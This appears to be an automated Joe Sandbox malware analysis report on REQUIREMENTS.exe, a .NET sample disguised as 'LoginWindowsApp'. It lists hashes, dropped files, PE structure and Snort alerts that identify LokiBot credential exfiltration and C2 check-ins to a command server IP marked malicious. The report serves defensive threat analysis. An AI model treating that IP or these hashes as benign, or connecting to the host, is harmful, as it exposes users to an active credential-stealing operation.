                http://www.ibsensoftware.com/REQUIREMENTS.exe, REQUIREMENTS.exe, 00000001.00000002.504516698.0000000000400000.00000040.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                45.134.225.18
                		unknownGermany
                		203380DAINTERNATIONALGROUPGBtrue

                General Information

                Joe Sandbox Version:31.0.0 Red Diamond
                Analysis ID:326330
                Start date:03.12.2020
                Start time:09:57:24
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 7m 13s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:REQUIREMENTS.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:21
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@3/3@0/1
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 6.8% (good quality ratio 6.4%)
                • Quality average: 74.4%
                • Quality standard deviation: 29.1%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .exe
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                • HTTP Packets have been reduced
                • TCP Packets have been reduced to 100
                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                09:58:22API Interceptor386x Sleep call for process: REQUIREMENTS.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                DAINTERNATIONALGROUPGB1.12.2018.jsGet hashmaliciousBrowse
                • 79.124.7.11
                http://myxacokkla.org/review/file/ada111e6978a6707918bbe0661ea2063/Get hashmaliciousBrowse
                • 82.118.234.90

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\REQUIREMENTS.exe.log
                Process:C:\Users\user\Desktop\REQUIREMENTS.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):792
                Entropy (8bit):5.331449916613832
                Encrypted:false
                SSDEEP:24:MLKE4K5E4Ks29E4Kx1qE4x84qXKDE4KhK3VZ9pKhk:MuHK5HKX9HKx1qHxviYHKhQnok
                MD5:48C35637F4E5AE32A768BDF159A4B32E
                SHA1:C27B5E37426D6496AF195A39B7882DF50341EE4A
                SHA-256:43567270C0C1C1BCD458595B138034B2A6F6DC4B2DFFA475AE7D629BE4C93BD2
                SHA-512:B4E98A592CC5EDB8E3379283756A01B7712922748BF4FC19E41B1205DD404367C11357BB17824419A2C4B2CE007BEAA55EBA97F602BC5B361EABC222CBC0374D
                Malicious:true
                Reputation:moderate, very likely benign file
                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                Process:C:\Users\user\Desktop\REQUIREMENTS.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Reputation:high, very likely benign file
                Preview: 1
                C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\89dad5d484a9f889a3a8dfca823edc3e_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                Process:C:\Users\user\Desktop\REQUIREMENTS.exe
                File Type:data
                Category:dropped
                Size (bytes):72803
                Entropy (8bit):0.6755932952713242
                Encrypted:false
                SSDEEP:12:fMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMet:9
                MD5:0F0453B0C756FF7AD6D3F6275F8B968A
                SHA1:F155765DC465153DA190808ECE27542AFC40F198
                SHA-256:2A7BEB2709261214100975B37A9A8D7BBC10E9786D5C138C010494B5C6240CB5
                SHA-512:F71B830EF0E1E8CBC6CC5E4E4E208B579CC9943053E856FAB7E45E6B0FF2C43BCC5F67ADB4AAEAAAF3D70E563A63C4FE79D7E9C0B58A712FF4E49F7926F19C27
                Malicious:false
                Reputation:low
                Preview: ........................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user..............

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit):6.625009476145265
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                • Win32 Executable (generic) a (10002005/4) 49.75%
                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                • Windows Screen Saver (13104/52) 0.07%
                • Generic Win/DOS Executable (2004/3) 0.01%
                File name:REQUIREMENTS.exe
                File size:538112
                MD5:70109889c622058fd38e3b14965ca813
                SHA1:c8dbd06cca04210f0be50e741b299d27b3f7a4c2
                SHA256:cfb1834c33817d2fb697bd75004827c5d888e6f62e5db56d2381014e58290821
                SHA512:7defb88502b82f9e21292b7449f1d535e3057eb5148917e7cf34f61d70890392eabf7a71db1530555dc1c31900f7599d53afcfc04b6b228faea3c87cdacee64e
                SSDEEP:12288:h9XtfngfJ042qPVGNbTuMuKBD7hpvAZnKuV8O9kFn9tqZv:hDgST0sDdsnv8Yk3tqZ
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)._..............P..,...........K... ...`....@.. ....................................@................................

                File Icon

                Icon Hash:00828e8e8686b000

                Static PE Info

                General

                Entrypoint:0x484b8a
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Time Stamp:0x5FC829D6 [Wed Dec 2 23:57:10 2020 UTC]
                TLS Callbacks:
                CLR (.Net) Version:v4.0.30319
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                Entrypoint Preview

                Instruction
                jmp dword ptr [00402000h]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x84b380x4f.text
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x860000x5cc.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000xc.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x20000x82b900x82c00False0.641155293977data6.63573166076IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .rsrc0x860000x5cc0x600False0.423828125data4.13979451703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x880000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountry
                RT_VERSION0x860900x33cdata
                RT_MANIFEST0x863dc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                Imports

                DLLImport
                mscoree.dll_CorExeMain

                Version Infos

                DescriptionData
                Translation0x0000 0x04b0
                LegalCopyrightCopyright 2011
                Assembly Version1.0.0.0
                InternalNameIEnumerable.exe
                FileVersion1.0.0.0
                CompanyName
                LegalTrademarks
                Comments
                ProductNameLoginWindowsApp
                ProductVersion1.0.0.0
                FileDescriptionLoginWindowsApp
                OriginalFilenameIEnumerable.exe

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                12/03/20-09:58:26.503770TCP2570WEB-MISC Invalid HTTP Version String4972080192.168.2.545.134.225.18
                12/03/20-09:58:26.503770TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14972080192.168.2.545.134.225.18
                12/03/20-09:58:26.503770TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972080192.168.2.545.134.225.18
                12/03/20-09:58:26.503770TCP2025381ET TROJAN LokiBot Checkin4972080192.168.2.545.134.225.18
                12/03/20-09:58:26.503770TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24972080192.168.2.545.134.225.18
                12/03/20-09:58:26.824676TCP2570WEB-MISC Invalid HTTP Version String4972180192.168.2.545.134.225.18
                12/03/20-09:58:26.824676TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14972180192.168.2.545.134.225.18
                12/03/20-09:58:26.824676TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972180192.168.2.545.134.225.18
                12/03/20-09:58:26.824676TCP2025381ET TROJAN LokiBot Checkin4972180192.168.2.545.134.225.18
                12/03/20-09:58:26.824676TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24972180192.168.2.545.134.225.18
                12/03/20-09:58:27.056194TCP2570WEB-MISC Invalid HTTP Version String4972280192.168.2.545.134.225.18
                12/03/20-09:58:27.056194TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972280192.168.2.545.134.225.18
                12/03/20-09:58:27.056194TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972280192.168.2.545.134.225.18
                12/03/20-09:58:27.056194TCP2025381ET TROJAN LokiBot Checkin4972280192.168.2.545.134.225.18
                12/03/20-09:58:27.056194TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972280192.168.2.545.134.225.18
                12/03/20-09:58:27.336149TCP2570WEB-MISC Invalid HTTP Version String4972380192.168.2.545.134.225.18
                12/03/20-09:58:27.336149TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972380192.168.2.545.134.225.18
                12/03/20-09:58:27.336149TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972380192.168.2.545.134.225.18
                12/03/20-09:58:27.336149TCP2025381ET TROJAN LokiBot Checkin4972380192.168.2.545.134.225.18
                12/03/20-09:58:27.336149TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972380192.168.2.545.134.225.18
                12/03/20-09:58:27.613623TCP2570WEB-MISC Invalid HTTP Version String4972480192.168.2.545.134.225.18
                12/03/20-09:58:27.613623TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972480192.168.2.545.134.225.18
                12/03/20-09:58:27.613623TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972480192.168.2.545.134.225.18
                12/03/20-09:58:27.613623TCP2025381ET TROJAN LokiBot Checkin4972480192.168.2.545.134.225.18
                12/03/20-09:58:27.613623TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972480192.168.2.545.134.225.18
                12/03/20-09:58:27.897850TCP2570WEB-MISC Invalid HTTP Version String4972580192.168.2.545.134.225.18
                12/03/20-09:58:27.897850TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972580192.168.2.545.134.225.18
                12/03/20-09:58:27.897850TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972580192.168.2.545.134.225.18
                12/03/20-09:58:27.897850TCP2025381ET TROJAN LokiBot Checkin4972580192.168.2.545.134.225.18
                12/03/20-09:58:27.897850TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972580192.168.2.545.134.225.18
                12/03/20-09:58:28.184462TCP2570WEB-MISC Invalid HTTP Version String4972680192.168.2.545.134.225.18
                12/03/20-09:58:28.184462TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972680192.168.2.545.134.225.18
                12/03/20-09:58:28.184462TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972680192.168.2.545.134.225.18
                12/03/20-09:58:28.184462TCP2025381ET TROJAN LokiBot Checkin4972680192.168.2.545.134.225.18
                12/03/20-09:58:28.184462TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972680192.168.2.545.134.225.18
                12/03/20-09:58:28.460179TCP2570WEB-MISC Invalid HTTP Version String4972780192.168.2.545.134.225.18
                12/03/20-09:58:28.460179TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972780192.168.2.545.134.225.18
                12/03/20-09:58:28.460179TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972780192.168.2.545.134.225.18
                12/03/20-09:58:28.460179TCP2025381ET TROJAN LokiBot Checkin4972780192.168.2.545.134.225.18
                12/03/20-09:58:28.460179TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972780192.168.2.545.134.225.18
                12/03/20-09:58:28.750069TCP2570WEB-MISC Invalid HTTP Version String4972880192.168.2.545.134.225.18
                12/03/20-09:58:28.750069TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972880192.168.2.545.134.225.18
                12/03/20-09:58:28.750069TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972880192.168.2.545.134.225.18
                12/03/20-09:58:28.750069TCP2025381ET TROJAN LokiBot Checkin4972880192.168.2.545.134.225.18
                12/03/20-09:58:28.750069TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972880192.168.2.545.134.225.18
                12/03/20-09:58:29.038505TCP2570WEB-MISC Invalid HTTP Version String4972980192.168.2.545.134.225.18
                12/03/20-09:58:29.038505TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972980192.168.2.545.134.225.18
                12/03/20-09:58:29.038505TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972980192.168.2.545.134.225.18
                12/03/20-09:58:29.038505TCP2025381ET TROJAN LokiBot Checkin4972980192.168.2.545.134.225.18
                12/03/20-09:58:29.038505TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972980192.168.2.545.134.225.18
                12/03/20-09:58:29.329893TCP2570WEB-MISC Invalid HTTP Version String4973080192.168.2.545.134.225.18
                12/03/20-09:58:29.329893TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973080192.168.2.545.134.225.18
                12/03/20-09:58:29.329893TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.545.134.225.18
                12/03/20-09:58:29.329893TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.545.134.225.18
                12/03/20-09:58:29.329893TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973080192.168.2.545.134.225.18
                12/03/20-09:58:29.618995TCP2570WEB-MISC Invalid HTTP Version String4973180192.168.2.545.134.225.18
                12/03/20-09:58:29.618995TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.545.134.225.18
                12/03/20-09:58:29.618995TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.545.134.225.18
                12/03/20-09:58:29.618995TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.545.134.225.18
                12/03/20-09:58:29.618995TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973180192.168.2.545.134.225.18
                12/03/20-09:58:29.938024TCP2570WEB-MISC Invalid HTTP Version String4973280192.168.2.545.134.225.18
                12/03/20-09:58:29.938024TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973280192.168.2.545.134.225.18
                12/03/20-09:58:29.938024TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973280192.168.2.545.134.225.18
                12/03/20-09:58:29.938024TCP2025381ET TROJAN LokiBot Checkin4973280192.168.2.545.134.225.18
                12/03/20-09:58:29.938024TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973280192.168.2.545.134.225.18
                12/03/20-09:58:30.229908TCP2570WEB-MISC Invalid HTTP Version String4973480192.168.2.545.134.225.18
                12/03/20-09:58:30.229908TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973480192.168.2.545.134.225.18
                12/03/20-09:58:30.229908TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973480192.168.2.545.134.225.18
                12/03/20-09:58:30.229908TCP2025381ET TROJAN LokiBot Checkin4973480192.168.2.545.134.225.18
                12/03/20-09:58:30.229908TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973480192.168.2.545.134.225.18
                12/03/20-09:58:30.508997TCP2570WEB-MISC Invalid HTTP Version String4973580192.168.2.545.134.225.18
                12/03/20-09:58:30.508997TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973580192.168.2.545.134.225.18
                12/03/20-09:58:30.508997TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.545.134.225.18
                12/03/20-09:58:30.508997TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.545.134.225.18
                12/03/20-09:58:30.508997TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973580192.168.2.545.134.225.18
                12/03/20-09:58:30.817865TCP2570WEB-MISC Invalid HTTP Version String4973680192.168.2.545.134.225.18
                12/03/20-09:58:30.817865TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973680192.168.2.545.134.225.18
                12/03/20-09:58:30.817865TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973680192.168.2.545.134.225.18
                12/03/20-09:58:30.817865TCP2025381ET TROJAN LokiBot Checkin4973680192.168.2.545.134.225.18
                12/03/20-09:58:30.817865TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973680192.168.2.545.134.225.18
                12/03/20-09:58:31.118492TCP2570WEB-MISC Invalid HTTP Version String4973780192.168.2.545.134.225.18
                12/03/20-09:58:31.118492TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973780192.168.2.545.134.225.18
                12/03/20-09:58:31.118492TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.545.134.225.18
                12/03/20-09:58:31.118492TCP2025381ET TROJAN LokiBot Checkin4973780192.168.2.545.134.225.18
                12/03/20-09:58:31.118492TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973780192.168.2.545.134.225.18
                12/03/20-09:58:31.421359TCP2570WEB-MISC Invalid HTTP Version String4973980192.168.2.545.134.225.18
                12/03/20-09:58:31.421359TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.545.134.225.18
                12/03/20-09:58:31.421359TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.545.134.225.18
                12/03/20-09:58:31.421359TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.545.134.225.18
                12/03/20-09:58:31.421359TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.545.134.225.18
                12/03/20-09:58:31.707667TCP2570WEB-MISC Invalid HTTP Version String4974080192.168.2.545.134.225.18
                12/03/20-09:58:31.707667TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.545.134.225.18
                12/03/20-09:58:31.707667TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.545.134.225.18
                12/03/20-09:58:31.707667TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.545.134.225.18
                12/03/20-09:58:31.707667TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974080192.168.2.545.134.225.18
                12/03/20-09:58:32.001072TCP2570WEB-MISC Invalid HTTP Version String4974180192.168.2.545.134.225.18
                12/03/20-09:58:32.001072TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.545.134.225.18
                12/03/20-09:58:32.001072TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.545.134.225.18
                12/03/20-09:58:32.001072TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.545.134.225.18
                12/03/20-09:58:32.001072TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974180192.168.2.545.134.225.18
                12/03/20-09:58:32.303788TCP2570WEB-MISC Invalid HTTP Version String4974280192.168.2.545.134.225.18
                12/03/20-09:58:32.303788TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.545.134.225.18
                12/03/20-09:58:32.303788TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.545.134.225.18
                12/03/20-09:58:32.303788TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.545.134.225.18
                12/03/20-09:58:32.303788TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974280192.168.2.545.134.225.18
                12/03/20-09:58:32.584072TCP2570WEB-MISC Invalid HTTP Version String4974380192.168.2.545.134.225.18
                12/03/20-09:58:32.584072TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.545.134.225.18
                12/03/20-09:58:32.584072TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.545.134.225.18
                12/03/20-09:58:32.584072TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.545.134.225.18
                12/03/20-09:58:32.584072TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.545.134.225.18
                12/03/20-09:58:32.889249TCP2570WEB-MISC Invalid HTTP Version String4974580192.168.2.545.134.225.18
                12/03/20-09:58:32.889249TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.545.134.225.18
                12/03/20-09:58:32.889249TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.545.134.225.18
                12/03/20-09:58:32.889249TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.545.134.225.18
                12/03/20-09:58:32.889249TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.545.134.225.18
                12/03/20-09:58:33.200974TCP2570WEB-MISC Invalid HTTP Version String4974680192.168.2.545.134.225.18
                12/03/20-09:58:33.200974TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.545.134.225.18
                12/03/20-09:58:33.200974TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.545.134.225.18
                12/03/20-09:58:33.200974TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.545.134.225.18
                12/03/20-09:58:33.200974TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.545.134.225.18
                12/03/20-09:58:33.508634TCP2570WEB-MISC Invalid HTTP Version String4974780192.168.2.545.134.225.18
                12/03/20-09:58:33.508634TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.545.134.225.18
                12/03/20-09:58:33.508634TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.545.134.225.18
                12/03/20-09:58:33.508634TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.545.134.225.18
                12/03/20-09:58:33.508634TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.545.134.225.18
                12/03/20-09:58:33.797664TCP2570WEB-MISC Invalid HTTP Version String4974880192.168.2.545.134.225.18
                12/03/20-09:58:33.797664TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.545.134.225.18
                12/03/20-09:58:33.797664TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.545.134.225.18
                12/03/20-09:58:33.797664TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.545.134.225.18
                12/03/20-09:58:33.797664TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.545.134.225.18
                12/03/20-09:58:34.092809TCP2570WEB-MISC Invalid HTTP Version String4974980192.168.2.545.134.225.18
                12/03/20-09:58:34.092809TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.545.134.225.18
                12/03/20-09:58:34.092809TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.545.134.225.18
                12/03/20-09:58:34.092809TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.545.134.225.18
                12/03/20-09:58:34.092809TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.545.134.225.18
                12/03/20-09:58:34.387134TCP2570WEB-MISC Invalid HTTP Version String4975080192.168.2.545.134.225.18
                12/03/20-09:58:34.387134TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.545.134.225.18
